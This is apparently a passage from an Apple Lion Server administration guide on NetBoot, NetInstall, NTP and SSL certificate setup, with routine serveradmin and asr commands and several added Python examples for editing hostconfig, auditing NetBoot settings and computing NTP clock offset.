The image does not start multicasting on the network until a client attempts to start a restore. The server continues to multicast the image until the process is terminated.

To configure a client to receive a multicast stream:

$ sudo asr -source asr://hostname -target targetvol -erase

The client receives the multicast stream from hostname and saves it to the client.

To overwrite an existing image, add -erase. Using -erase with -target indicates an image should be overwritten when doing a multicas t.

For information about asr, see its man page.


Select a NetInstall image


On a client computer, use Startup Disk preferences to select a NetInstall image.

1. In System Preferences, select Startup Disk.
2. Select the network volume to start the computer with.
3. Click Restart. The NetBoot icon appears, the computer starts from the selected image, and the installer runs.


Start up using the N key


You can use this method to start up any supported client computer from a NetBoot disk image. When you start up with the N key, the client computer starts up from the default NetBoot disk image. If multiple servers are present, the client starts up from the default image of the first server to respond.

Note: For more information about using the N key when starting the system, see the manual that was provided with the computer. Some computers have extra capabilities.

If an older client computer requires BootP for IP addressing (such as a tray-loading iMac, blue and white PowerMac G3, or older computer), use this method for starting up from a NetBoot disk image. Older computers don't support selecting a NetBoot startup disk image from the Startup Disk control panel or preferences pane.

The N key also provides a way to start up client computers that don't have system software installed. See Set up diskless clients.

1. Start up (or restart) the client computer and hold down the N key immediately after you hear the startup tone (while the screen is still black). You can release the N key when the NetBoot icon appears in the center of the screen.
2. If a login window appears, enter your name and password. The network disk image has an icon typical of server volumes.


Change how NetBoot clients allocate shadow files


By default, a Mac OS X Lion NetBoot client places its shadow files in a NetBootClientsn share point on the server, where n is the share point number. If no such share point is available, the client tries to store its shadow files on a local hard disk. For Mac OS X v10.3 and later images set for diskless booting, you can change this behavior by using a text editor to specify a value for the NETBOOT_SHADOW variable in the image's /etc/hostconfig file.

Note: This value is set in the /etc/hostconfig file in the image .dmg file, not in the server's hostconfig file.

These values are permitted:

-NETWORK- (Default): Try to use a server NetBootClientsn share point for storing shadow files. If no server share point is available, use a local drive.

-NETWORK_ONLY-: Try to use a server NetBootClientsn share point for storing shadow files. If no server share point is available, don't boot.

-LOCAL-: Try to use a local drive for storing shadow files. If no local drive is available, use a server NetBootClientsn share point.

-LOCAL_ONLY-: Try to use a local drive for storing shadow files. If no local drive is available, don't boot.
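As an added example (not from this guide), a Python helper that reads and sets NETBOOT_SHADOW in the text of an image's /etc/hostconfig, accepting only the four documented values. It assumes hostconfig uses one KEY=VALUE line per setting (as in HOSTNAME=-AUTOMATIC-); the sample file content is constructed.

```python
# Added example: validate and set NETBOOT_SHADOW in the text of an image's /etc/hostconfig.
# Assumes one KEY=VALUE per line (for example HOSTNAME=-AUTOMATIC-); sample content is constructed.

ALLOWED_VALUES = ("-NETWORK-", "-NETWORK_ONLY-", "-LOCAL-", "-LOCAL_ONLY-")
DEFAULT_VALUE = "-NETWORK-"   # behaviour when the variable is absent (see the table above)

# Constructed stand-in for the /etc/hostconfig inside an image .dmg (not copied from a real image).
SAMPLE_HOSTCONFIG = """\
# constructed sample hostconfig
HOSTNAME=-AUTOMATIC-
AFPSERVER=-NO-
NETBOOT_SHADOW=-NETWORK-
"""


def _is_definition(line: str, key: str) -> bool:
    """True if line is an uncommented KEY=... assignment for key."""
    stripped = line.strip()
    return not stripped.startswith("#") and stripped.split("=", 1)[0].strip() == key


def get_netboot_shadow(hostconfig_text: str) -> str:
    """Return the effective NETBOOT_SHADOW value (last uncommented definition wins) or the default."""
    value = DEFAULT_VALUE
    for line in hostconfig_text.splitlines():
        if _is_definition(line, "NETBOOT_SHADOW"):
            value = line.split("=", 1)[1].strip()
    return value


def set_netboot_shadow(hostconfig_text: str, value: str) -> str:
    """Return hostconfig text with exactly one NETBOOT_SHADOW definition set to value.

    Rejects anything outside the four documented values, replaces the first existing
    definition in place, drops duplicate definitions, and appends the line if none exists.
    """
    if value not in ALLOWED_VALUES:
        raise ValueError(f"NETBOOT_SHADOW must be one of {ALLOWED_VALUES}, got {value!r}")
    new_line = f"NETBOOT_SHADOW={value}"
    out, replaced = [], False
    for line in hostconfig_text.splitlines():
        if _is_definition(line, "NETBOOT_SHADOW"):
            if not replaced:
                out.append(new_line)
                replaced = True
            continue   # a second definition would be ambiguous, so it is dropped
        out.append(line)
    if not replaced:
        out.append(new_line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    # -NETWORK_ONLY- makes the client refuse to boot rather than fall back to its local disk,
    # so shadow data from a diskless deployment never lands on local storage.
    print(set_netboot_shadow(SAMPLE_HOSTCONFIG, "-NETWORK_ONLY-"))
```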

Network infrastructure services

NetBoot

Manage NetBoot service

Tools for managing NetBoot service


The Server Admin and System Image Utility applications provide a graphical interface for managing NetBoot service in Lion Server. In addition, you can manage NetBoot service from the command line by using Terminal. These applications are included with Lion Server and can be installed on another computer with Mac OS X Lion, making that computer an administrator computer. For more information about setting up an administrator computer, see the server administration chapter of Getting Started.

Server Admin

Server Admin provides access to tools you use to set up, manage, and monitor NetBoot service and other services. You use Server Admin to:
- Set up Lion Server as a DHCP server and configure NetBoot service to use NetBoot and NetInstall images. For instructions, see NetBoot setup overview.
- Manage and monitor NetBoot service.

For more information about using Server Admin, see Server Admin help or Advanced Server Administration. This guide includes information about:
- Opening and authenticating in Server Admin
- Working with specific servers
- Administering services
- Using SSL for remote server administration
- Customizing the Server Admin environment

Server Admin is installed in /Applications/Server/.

Server app

The Server app provides management of clients of Lion Server. For information about using the Server app, see Server app Help. This includes:
- Creating users and groups
- Administering accounts

Server app is installed in /Applications/.

Workgroup Manager

The Workgroup Manager application provides comprehensive management of clients of Lion Server. For information about using Workgroup Manager, see Workgroup Manager Help. This includes:
- Opening and authenticating in Workgroup Manager
- Administering accounts
- Customizing the Workgroup Manager environment

Workgroup Manager is installed in /Applications/Server/.

System Image Utility

System Image Utility is a tool to create and customize NetBoot, NetInstall, and NetRestore images. With System Image Utility, you can:
- Create NetBoot images that can be booted to the Finder.
- Create NetInstall images from a DVD or existing Mac OS X Lion partition.
- Create NetRestore images from an existing volume.
- Assemble a workflow that creates customized NetBoot and NetInstall images.

For instructions on using System Image Utility, see System Image Utility help. System Image Utility is installed in /Applications/Server/.

Command-line tools

A full range of command-line tools is available for administrators who prefer to use command-driven server administration. For remote server management, submit commands in a secure shell (SSH) session. You can enter commands on a Mac computer using the Terminal application, located in the /Applications/Utilities/ folder.


Turn off NetBoot service


The best way to prevent clients from using NetBoot on the server is to disable NetBoot service on all Ethernet ports.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click the Stop NetBoot button (below the Servers list) and perform one of the following tasks:
- To stop service on a specific Ethernet port, click Settings, click General, and deselect the Enable checkbox for the port.
- To stop serving a specific image, click Settings, click Images, and deselect the Enable checkbox for the image.
- To stop service to a client, click Settings, click Filters, select Enable NetBoot Filtering, choose Deny only clients listed below, and add the client's hardware address to the list.


Use serveradmin to turn off NetBoot service


You can use serveradmin to turn off NetBoot service.

To stop NetBoot service or disable images:

$ sudo serveradmin stop netboot

For information about serveradmin, see its man page.


Disable a boot or installation image


Disabling an image prevents client computers from starting using the image.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click Images.
5. In the Enable column, deselect the checkbox for the image.
6. Click Save.


Use serveradmin to disable boot or installation images


You can use serveradmin to disable an image, preventing client computers from starting using the image.

To stop NetBoot service or disable images:

$ sudo serveradmin stop netboot

For information about serveradmin, see its man page.


View a list of NetBoot clients


You can use Server Admin to see a list of clients that have booted from the server.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Clients.
5. To update the list, click the Refresh button (below the Servers list).

Note: This is a cumulative list (all clients that have ever connected), not a list of currently connected clients. The last boot time is shown for each client.


View a list of NetBoot connections


You can use Server Admin to see a list of clients that are booted from the server. NetInstall clients display install progress information.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Connections.
5. To update the list, click the Refresh button (below the Servers list).


Check the status of NetBoot and related services

You can use Server Admin to check the status of NetBoot service and the services (such as NFS and HTTP) it uses.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Overview to see if the service is running, when the last client update occurred, and which related services are running for an image type.
5. To review the event log, click Log.
6. To see a list of NetBoot clients that have booted from the server, click Clients.
7. To see a list of connected users, click Connections. The list includes the client computer name, IP address, the percentage complete, and the status.


Use serveradmin to check the status of NetBoot and related services


You can use serveradmin to check the status of NetBoot service and the services (such as NFS and HTTP) it uses.

To see if the service is running:

$ sudo serveradmin status netboot

To see the complete service status:

$ sudo serveradmin fullstatus netboot

For information about serveradmin, see its man page.


View the NetBoot service log


You can use Server Admin to view a log containing diagnostic information.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Log, then use the Filter field to search for specific entries.


Use serveradmin to view the NetBoot service log


You can use serveradmin to view a log containing diagnostic information.

To view the latest entries in a log:

$ tail log-file

To see where service logs are located:

$ sudo serveradmin command netboot:command = getLogPaths

For information about tail and serveradmin, see their man pages.


Performance and load balancing


For good startup performance, the NetBoot server must be available to the client computer relying on it. To provide responsive and reliable NetBoot service, set up multiple NetBoot servers in your network.

Many sites using NetBoot service achieve acceptable responsiveness by staggering the boot times of client computers to reduce network load. Generally, it isn't necessary to boot client computers at the same time; rather, client computers are booted early in the morning and remain booted throughout the work day. You can program staggered startup times using the Energy Saver preferences pane.

Load balancing NetBoot images

If heavy usage and simultaneous client startups are overloading a NetBoot server and causing delays, consider load balancing by adding extra NetBoot servers to distribute the demands of the client computers across multiple servers. When incorporating multiple NetBoot servers, use switches in your network infrastructure. The shared nature of hubs creates a single shared network on which extra servers must vie for time.


Distribute NetBoot images across servers


If you set up more than one NetBoot server on your network, you can place copies of a specific NetBoot image on multiple servers to distribute the load. By assigning the copies the same image index ID in the range 4096–65535, you can advertise them to your clients as a single image to avoid confusion.

Note: You must customize the image by creating a workflow with the Create Image action to assign the image an index ID.

1. Locate the image file on the server where the original image is stored.
2. If the image index ID is 4095 or lower, recreate the image and modify the index ID using the Create Image action in a workflow, then assign the image an index ID in the range 4096–65535. For more information, see System Image Utility Help. The image ID can be changed from Server Admin by double-clicking the Image ID field and entering the new ID.
3. Create copies or move image files to other servers.
4. On each server, use Server Admin to enable the image for NetBoot service.

Clients still see the image listed only once in Startup Disk preferences, but the server that delivers its copy of the image is selected based on server activity. Smaller improvements can be achieved by distributing NetBoot images across multiple disk drives on a single server.


Distribute NetBoot images across server disk drives


Even with a single NetBoot server, you might improve performance by distributing copies of an image across multiple disk drives on the server. By assigning the copies the same image index ID in the range 4096–65535, you can advertise them to your clients as a single image.

Important: Don't distribute images across different partitions of the same physical disk drive. Doing so does not improve, and can even reduce, performance.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select NetBoot.
4. Click Settings, then click General.
5. In the Images column, select the checkbox for each volume to store images on. Choose volumes on different physical disk drives.
6. Click Save, then click Images.
7. If the image's index is 4095 or lower, double-click the ID, enter an index in the range 4096–65535, and save the change.
8. Open Terminal and use the scp secure copy tool to copy the image to the NetBootSPn share points on the other volumes. For example:

$ scp -r /Library/NetBoot/NetBootSP0/image.nbi [admin_name]@[ip_address]:/Volumes/Drive2/Library/Ne

where [admin_name] is an admin login and [ip_address] is the correct IP address for that server. The .nbi image is a folder, so scp needs -r to copy it recursively. You are prompted for the password of the admin login.


Distribute shadow files


Clients starting up from Mac OS X Lion diskless images store shadow files on the server. By default, NetBoot for Mac clients creates a share point for client shadow files on the server boot volume. (You can change this behavior. See Choose where shadow files are stored.)

You can use Server Admin to see this share point and to add others. The share points are named NetBootClientsn, where n is the share point number. Share points are numbered starting with zero. For example, if your server has two disk volumes, the default shadow-file folder is NetBootClients0 on the boot volume. If you use Server Admin to specify that client data will also be stored on the second volume, the folder is named NetBootClients1.

NetBoot stores the first client's shadow files on NetBootClients0, the second client's shadow files on NetBootClients1, the third client's shadow files on NetBootClients2, and so on. Likewise, with three volumes and eight clients, the first, fourth, and seventh clients use the first volume; the second, fifth, and eighth clients use the second volume; and the third and sixth clients use the third volume. This load balancing is automatic and usually provides optimal performance.

To prevent shadow files from being placed on a specific volume, use the NetBoot Service General settings in Server Admin. Deselect the client data checkbox for any volume you don't want shadow files placed in. You can also prevent shadow files from being placed on a specific volume or partition by deleting the hidden file /Library/NetBoot/.clients, which is a symbolic link, and then stopping and restarting NetBoot service.


NetBoot service settings


General NetBoot settings

To configure general NetBoot service settings from Terminal, use the following parameters with the serveradmin tool. Each parameter is prefixed with netboot: (for example, netboot:filterEnabled).

filterEnabled
    A parameter that specifies whether client filtering is enabled. Default = "no"

netBootStorageRecordsArray...
    An array of values for each server volume used to store boot or installation images. For a description, see The storage record array.

netBootFiltersRecordsArray...
    An array of values for each computer explicitly allowed or disallowed access to images. For a description, see The filters record array.

netBootImagesRecordsArray...
    An array of values for each boot or installation image stored on the server. For a description, see The image record array.

netBootPortsRecordsArray...
    An array of values for each server network port used to deliver boot or installation images. For a description, see The port record array.

The storage record array

An array of the following values appears in NetBoot service settings for each volume on the server used to store boot or installation images.

netBootStorageRecordsArray:_array_index:n:sharepoint
    The first parameter in an array describing a volume available to serve images. Default = "no"

netBootStorageRecordsArray:_array_index:n:clients
    Default = "no"

netBootStorageRecordsArray:_array_index:n:ignorePrivs
    Default = "false"

netBootStorageRecordsArray:_array_index:n:volType
    Default = "voltype". Example: "hfs"

netBootStorageRecordsArray:_array_index:n:path
    Default = "/"

netBootStorageRecordsArray:_array_index:n:volName
    Default = "name"

netBootStorageRecordsArray:_array_index:n:volIcon
    Default = "icon"

netBootStorageRecordsArray:_array_index:n:okToDeleteClients
    Default = "yes"

netBootStorageRecordsArray:_array_index:n:okToDeleteSharepoint
    Default = "yes"

The filters record array

An array of the following values appears in NetBoot service settings for each computer explicitly allowed or denied access to images stored on the server.

netBootFiltersRecordsArray:_array_index:n:hostName
    The host name of the filtered computer, if available.

netBootFiltersRecordsArray:_array_index:n:filterType
    Whether the specified computer is allowed or denied access. Options: "allow", "deny"

netBootFiltersRecordsArray:_array_index:n:hardwareAddress
    The Ethernet hardware (MAC) address of the filtered computer.

The image record array

An array of the following values appears in NetBoot service settings for each image stored on the server.

netBootImagesRecordsArray:_array_index:n:Name
    The name of the image as it appears in the Startup Disk control panel (Mac OS 9) or Preferences pane (Mac OS X).

netBootImagesRecordsArray:_array_index:n:IsDefault
    yes: Specifies this image file as the default boot image on the subnet.

netBootImagesRecordsArray:_array_index:n:RootPath
    The path to the .dmg file.

netBootImagesRecordsArray:_array_index:n:isEdited
    Whether the image is edited.

netBootImagesRecordsArray:_array_index:n:BootFile
    Name of the boot ROM file: booter.

netBootImagesRecordsArray:_array_index:n:Description
    Arbitrary text describing the image.

netBootImagesRecordsArray:_array_index:n:SupportsDiskless
    yes: Directs the NetBoot server to allocate space for shadow files needed by diskless clients.

netBootImagesRecordsArray:_array_index:n:Type
    NFS or HTTP

netBootImagesRecordsArray:_array_index:n:pathToImage
    The path to the parameter list file in the .nbi folder on the server describing the image.

netBootImagesRecordsArray:_array_index:n:Index
    1–4095: Indicates a local image unique to the server.
    4096–65535: A duplicate, identical image stored on multiple servers for load balancing.

netBootImagesRecordsArray:_array_index:n:IsEnabled
    Sets whether the image is available to NetBoot (or Network Image) clients.

netBootImagesRecordsArray:_array_index:n:IsInstall
    yes: Specifies a network installation image.
    no: Specifies a NetBoot image.

The port record array

An array of the following items is included in the NetBoot service settings for each network port on the server set to deliver images.

netBootPortsRecordsArray:_array_index:m:isEnabledAtIndex
    The first parameter in an array describing a network interface available for responding to netboot requests. Default = "no"

netBootPortsRecordsArray:_array_index:m:nameAtIndex
    Default = "devname". Example: "Built-in Ethernet"

netBootPortsRecordsArray:_array_index:m:deviceAtIndex
    Default = "dev". Example: "en0"
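As an added example (not part of this guide), a Python parser for the key = value lines that sudo serveradmin settings netboot prints, followed by two checks an administrator would run over the parsed records: which images are enabled and whether their index IDs fall in the shared 4096–65535 range, and whether client filtering is on and which hardware addresses it allows or denies. The sample output is constructed using the parameter names from the tables above; the line format (one key = value per line, _array_index:n for array members, _empty_array for an empty array) is assumed from the tool's output style.

```python
# Added example: parse `serveradmin settings netboot` output and audit image and filter records.
# SAMPLE_SETTINGS is constructed, not captured from a real server; every value is illustrative.
SAMPLE_SETTINGS = """\
netboot:filterEnabled = yes
netboot:netBootFiltersRecordsArray:_array_index:0:filterType = "deny"
netboot:netBootFiltersRecordsArray:_array_index:0:hardwareAddress = "00:11:22:33:44:55"
netboot:netBootFiltersRecordsArray:_array_index:0:hostName = "lab-07"
netboot:netBootImagesRecordsArray:_array_index:0:Name = "Lion NetBoot"
netboot:netBootImagesRecordsArray:_array_index:0:IsEnabled = yes
netboot:netBootImagesRecordsArray:_array_index:0:IsInstall = no
netboot:netBootImagesRecordsArray:_array_index:0:Index = 4096
netboot:netBootImagesRecordsArray:_array_index:0:Type = "NFS"
netboot:netBootImagesRecordsArray:_array_index:1:Name = "Lion NetInstall"
netboot:netBootImagesRecordsArray:_array_index:1:IsEnabled = no
netboot:netBootImagesRecordsArray:_array_index:1:IsInstall = yes
netboot:netBootImagesRecordsArray:_array_index:1:Index = 1
netboot:netBootImagesRecordsArray:_array_index:1:Type = "HTTP"
netboot:netBootPortsRecordsArray:_array_index:0:deviceAtIndex = "en0"
netboot:netBootPortsRecordsArray:_array_index:0:isEnabledAtIndex = yes
netboot:netBootStorageRecordsArray = _empty_array
"""


def parse_value(raw: str):
    """Convert a serveradmin literal: "string", yes/no, integer, or _empty_array."""
    raw = raw.strip()
    if raw == "_empty_array":
        return []
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    if raw in ("yes", "no"):
        return raw == "yes"
    if raw.lstrip("-").isdigit():
        return int(raw)
    return raw


def _tokens(key: str) -> list:
    """Split netboot:a:_array_index:3:b into ["a", 3, "b"]; an int marks a list position."""
    parts = key.strip().split(":")
    if parts and parts[0] == "netboot":
        parts = parts[1:]
    tokens, i = [], 0
    while i < len(parts):
        if parts[i] == "_array_index" and i + 1 < len(parts):
            tokens.append(int(parts[i + 1]))
            i += 2
        else:
            tokens.append(parts[i])
            i += 1
    return tokens


def _store(node, tokens: list, value) -> None:
    """Walk (creating nested dicts and lists as needed) along tokens and store value at the leaf."""
    for depth, tok in enumerate(tokens):
        if isinstance(node, list):
            while len(node) <= tok:
                node.append(None)
        if depth == len(tokens) - 1:
            node[tok] = value
            return
        child_type = list if isinstance(tokens[depth + 1], int) else dict
        if isinstance(node, list):
            if node[tok] is None:
                node[tok] = child_type()
            node = node[tok]
        else:
            node = node.setdefault(tok, child_type())


def parse_settings(text: str) -> dict:
    """Parse `key = value` lines into nested dicts; record arrays become lists of dicts."""
    settings = {}
    for line in text.splitlines():
        if " = " not in line:
            continue
        key, raw = line.split(" = ", 1)
        _store(settings, _tokens(key), parse_value(raw))
    return settings


def audit_images(settings: dict) -> list:
    """One summary per image; 'shared' marks an index in the 4096-65535 load-balancing range."""
    summary = []
    for image in settings.get("netBootImagesRecordsArray") or []:
        index = image.get("Index") or 0
        summary.append({
            "name": image.get("Name"),
            "enabled": bool(image.get("IsEnabled")),
            "install": bool(image.get("IsInstall")),
            "index": index,
            "shared": 4096 <= index <= 65535,
            "type": image.get("Type"),
        })
    return summary


def audit_filters(settings: dict) -> dict:
    """Report whether filtering is on and which hardware addresses are explicitly allowed or denied.
    With filtering off, any client that reaches the server on an enabled port can boot its images."""
    by_type = {"allow": [], "deny": []}
    for entry in settings.get("netBootFiltersRecordsArray") or []:
        by_type.setdefault(entry.get("filterType"), []).append(entry.get("hardwareAddress"))
    return {"filtering_enabled": bool(settings.get("filterEnabled")),
            "allow": by_type["allow"], "deny": by_type["deny"]}
```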

Network infrastructure services

NetBoot

Solve NetBoot problems

NetBoot troubleshooting tips


- Make sure a DHCP service is available on your network. It can be provided by DHCP on a Mac server or another server.
- Make sure required services are started on the server. See NetBoot considerations and requirements.
- Open Server Admin and verify the following:
  - If you're booting Mac OS X Lion diskless clients, AFP is started.
  - If you're using HTTP instead of NFS to deliver images, Web service is started.


If NetBoot client computers don't start


If your NetBoot client computers do not start:
- Sometimes a computer might not start immediately because other computers are putting a heavy demand on the network. Wait a few minutes and try starting again.
- Make sure cables are properly connected and that the computer and server are getting power.
- If you installed memory or an expansion card in the client computer, make sure it is installed properly.
- If the computer has a local hard disk with a System Folder on it, disconnect the Ethernet cable and try to start the computer from the local hard disk, then reconnect the Ethernet cable and try to start the computer from the network.
- Boot the client computer from a local disk and verify that it is getting an IP address from DHCP.
- On a diskless or systemless client, start from a system CD and use Startup Disk preferences to select a boot image.


If you want to change the image name


You can't edit the name of an image with System Image Utility after you create it. However, there are other ways to change the name, shown below.

Change the name of an uncompressed image

1. Mount the image in Finder by opening the .nbi folder containing the image and double-clicking it.
2. Open Terminal and enter the following command to rename the image:

$ sudo diskutil rename /Volumes/image new_name

Replace image with the name of the image to rename and new_name with the new name of the image.
3. When prompted, enter your administrator password. The name of the image changes.
4. Unmount the image.
5. Remount the image to verify that it is renamed.

Change the name of a compressed image

1. Mount the image in Finder by opening the .nbi folder containing the image and double-clicking it.
2. Open Disk Utility.
3. Select the image and click Convert.
4. In the Save As field, enter a name.
5. Select a different location to save the image to. For example, save the image on the Desktop folder.
6. From the Image Format menu, choose read/write.
7. Click Save.
8. Unmount the image.
9. Mount the new image in the Finder.
10. Open a Terminal window and enter the following to rename the image:

$ sudo diskutil rename /Volumes/image new_name

Replace image with the name of the image to rename and new_name with the new name of the image.
11. When prompted, enter your administrator password. The name of the image changes.
12. Unmount the image.
13. Remount the image to verify that the image is renamed.
14. Unmount the image.
15. Remove the original image from the .nbi folder and store it somewhere else.
16. In Disk Utility, select the new image and click Convert.
17. Give the image the same name as the one it had inside the .nbi folder.
18. In the Where field, select the .nbi folder.
19. From the Format menu, choose Compressed.
20. Click Save.
21. Test the new image to make sure it mounts properly.
22. Discard the old image.

Network infrastructure services

Network Time Protocol (NTP)

About NTP
Using NTP service for time synchronization is important for reducing confusion that can be caused if time stamps are out of sync. From shared file systems to billing services, correct timekeeping is a necessity. However, clocks on computers throughout a network can have widely different time stamps.

Network Time Protocol (NTP) synchronizes the clocks in networked computers to a reference clock. NTP helps make sure that all computers on a network report the same time.

If an isolated network (or even a computer) is unsynchronized, services that use time and date stamps (such as Mail service, or Web service with timed cookies) send wrong time and date stamps and are out of sync with other computers across the Internet. For example, a mail message could arrive minutes or years before it was sent (according to the time stamp), and a reply to that message could come before the original was sent.

How NTP works

NTP uses Universal Time Coordinated (UTC) as its reference time. UTC is based on an atomic resonance, and clocks that run according to UTC are often referred to as atomic clocks. On the Internet, authoritative NTP servers (known as Stratum 1 servers) track the current UTC time. Other subordinate servers (known as Stratum 2 and 3 servers) regularly query Stratum 1 servers and estimate the time taken to send and receive the query. They then factor this estimate with the query result to set the Stratum 2 or 3 server's time. The estimates are correct to the nanosecond.

Your LAN can then query Stratum 3 servers for the time. An NTP client computer on your network then takes the UTC time reference and converts it using its own time zone setting to local time, and sets its internal clock accordingly.

NTP on your network

Lion Server can act as an NTP client, receiving authoritative time from an Internet time server, and as an authoritative time server for a network. Your local clients can query your server to set their clocks. If you set your server to answer time queries, set it to also query an authoritative time server on the Internet.

Find more information about NTP

The working group, documentation, and FAQ for NTP can be found at www.ntp.org. Listings of publicly accessible NTP servers and their use policies can be found at support.ntp.org/bin/view/Servers/WebHome. Request for Comments (RFC) documents provide an overview of a protocol or service and details about how the protocol should behave. If you're a novice server administrator, you'll probably find some of the background information in an RFC helpful. If you're an experienced server administrator, you can find all technical details about a protocol in its RFC document. You can search for RFC documents by number at www.ietf.org/rfc.html. The official specification of NTP is RFC 1305.
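As an added example (not from this guide), a Python sketch of the client-side calculation described above: build a version 3 (RFC 1305) client request, read the stratum and timestamps out of a server reply, and estimate the clock offset and round-trip delay from the four timestamps using the RFC 1305 formulas. The exchange is constructed in code (server clock 5 s ahead, 0.1 s each way on the wire), so nothing is sent over the network.

```python
import struct

# Added example: NTP v3 client request, reply parsing, and offset/delay estimation (RFC 1305).
NTP_UNIX_EPOCH_DELTA = 2208988800   # seconds from the NTP epoch (1900) to the Unix epoch (1970)
NTP_PACKET_SIZE = 48                # size of the basic NTP header
NTP_UDP_PORT = 123                  # the port the firewall must allow (see Set up NTP service)


def to_ntp(unix_time: float) -> tuple:
    """Split a Unix time into the NTP 32-bit seconds / 32-bit fraction pair."""
    whole = int(unix_time)
    return whole + NTP_UNIX_EPOCH_DELTA, int((unix_time - whole) * (1 << 32))


def from_ntp(seconds: int, fraction: int) -> float:
    """Inverse of to_ntp: NTP timestamp fields back to Unix seconds as a float."""
    return seconds - NTP_UNIX_EPOCH_DELTA + fraction / (1 << 32)


def build_client_request(t1: float) -> bytes:
    """Client packet: LI=0, VN=3, Mode=3 (client) in byte 0; transmit timestamp at bytes 40-47."""
    pkt = bytearray(NTP_PACKET_SIZE)
    pkt[0] = 0x1B
    struct.pack_into("!II", pkt, 40, *to_ntp(t1))
    return bytes(pkt)


def build_server_reply(request: bytes, t2: float, t3: float, stratum: int) -> bytes:
    """Constructed server reply (Mode=4): echoes the client's transmit time as the originate
    timestamp (bytes 24-31), then stores receive (32-39) and transmit (40-47) timestamps."""
    pkt = bytearray(NTP_PACKET_SIZE)
    pkt[0] = 0x1C               # LI=0, VN=3, Mode=4 (server)
    pkt[1] = stratum
    pkt[24:32] = request[40:48]
    struct.pack_into("!II", pkt, 32, *to_ntp(t2))
    struct.pack_into("!II", pkt, 40, *to_ntp(t3))
    return bytes(pkt)


def parse_server_reply(pkt: bytes) -> dict:
    """Validate a reply and return its stratum plus originate/receive/transmit times as Unix floats."""
    if len(pkt) < NTP_PACKET_SIZE:
        raise ValueError("short NTP packet")
    if pkt[0] & 0x07 != 4:
        raise ValueError("not a server (mode 4) reply")
    stratum = pkt[1]
    if stratum == 0 or stratum > 15:
        # 0 is unspecified (kiss-o'-death in later versions), 16 and above is unsynchronized
        raise ValueError(f"server not usable, stratum {stratum}")
    t1 = from_ntp(*struct.unpack_from("!II", pkt, 24))
    t2 = from_ntp(*struct.unpack_from("!II", pkt, 32))
    t3 = from_ntp(*struct.unpack_from("!II", pkt, 40))
    return {"stratum": stratum, "t1": t1, "t2": t2, "t3": t3}


def offset_and_delay(t1: float, t2: float, t3: float, t4: float) -> tuple:
    """RFC 1305 clock offset and round-trip delay from the four timestamps:
    t1 client send, t2 server receive, t3 server send, t4 client receive."""
    delay = (t4 - t1) - (t3 - t2)
    offset = ((t2 - t1) + (t3 - t4)) / 2
    return offset, delay


def sync_example() -> tuple:
    """Constructed exchange: server clock 5 s ahead, 0.1 s each way on the wire, 0.05 s processing."""
    t1 = 1_000_000_000.0
    request = build_client_request(t1)
    reply = build_server_reply(request, t2=t1 + 0.1 + 5.0, t3=t1 + 0.15 + 5.0, stratum=2)
    t4 = t1 + 0.25
    fields = parse_server_reply(reply)
    offset, delay = offset_and_delay(fields["t1"], fields["t2"], fields["t3"], t4)
    return fields["stratum"], offset, delay      # -> (2, ~5.0, ~0.2)
```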
RELATED TOPICS

Configure NTP service on clients
Set up NTP service


Configure NTP service on clients


If you have a local time server, you can configure clients to query your time server for the network date and time. By default, clients can query Apples time server. Use the following instructions to set your clients to query your time server.

1. Open System Preferences.
2. Click Date & Time.
3. Select the Set date & time automatically checkbox.
4. Select and delete the text in the field rather than using the pop-up menu.
5. Enter the host name of your time server. Your host name can be a domain name (such as time.example.com) or an IP address.
6. Close System Preferences.

RELATED TOPIC

About NTP


Set up NTP service


If you run NTP service on your network, make sure your designated NTP server can access a higher-authority time server. Apple provides a Stratum 2 time server for customer use at time.apple.com. Make sure your firewall permits NTP queries to an authoritative time server on UDP port 123, and that it also permits incoming queries from local clients on the same port.

1. Open Server Admin and connect to the server.
2. Click Settings, then click Date & Time.
3. Make sure your server is configured to Set date & time automatically.
4. From the pop-up menu, choose the server to act as a time server.
5. Click General.
6. Select the Network Time Server (NTP) checkbox.
7. Click Save.

RELATED TOPIC

About NTP

Network infrastructure services

SSL Certificates

Replace certificates
If you've assigned a certificate to a particular service, or to all services as a group, you can replace those certificates. You might replace the default self-signed certificate with one that's been signed by a third party, or you might need to replace an expired certificate. See Obtaining a Signed Certificate. If you receive a signed certificate from a third party, it should have an extension of .cer, .crt, or .p12.
RELATED INFORMATION

Obtain a CA-signed certificate


Create a self-signed certificate


If your server doesn't have an SSL certificate or if you need another one, start by creating a self-signed certificate.

1. Select the server under Hardware in the Server app sidebar.
2. Click Settings and then click the Edit button at the right of SSL Certificate.
3. From the Action pop-up menu, choose Manage Certificates.
4. Click the Add button (+) and choose Create Self-Signed Certificate from the pop-up menu.
5. In the Name field of the Certificate Assistant, enter your server's fully qualified host name (for example, server.example.com) and click Continue. Leave the other settings unchanged. Identity Type should be Self Signed Root, Certificate Type should be SSL Server, and Let me override defaults should be deselected.

You can choose the new self-signed certificate for the server. For information, see Using an SSL certificate. You can also use the new self-signed certificate to request a signed certificate from a certificate authority. For instructions, see Obtain a signed certificate.

Network infrastructure services

SSL Certificates

Import a certificate identity


If you have files containing an SSL certificate and matching private key, you can import them and then use the certificate to secure services provided by your server. The SSL keys and certificates must be in Privacy Enhanced Mail (PEM) format. If your certificates and keys aren't in PEM format, you must convert them.

1. In the Finder, locate the files containing the certificate and matching private key, and put the files where you can see them while using the Server app (for example, on the desktop).
2. In the Server app, select your server's name under Hardware in the Server app sidebar.
3. In the Settings pane, click the Edit button at the right of SSL Certificate.
4. From the Action pop-up menu, choose Manage Certificates.
5. Click + and then choose Import a Certificate Identity from the menu.
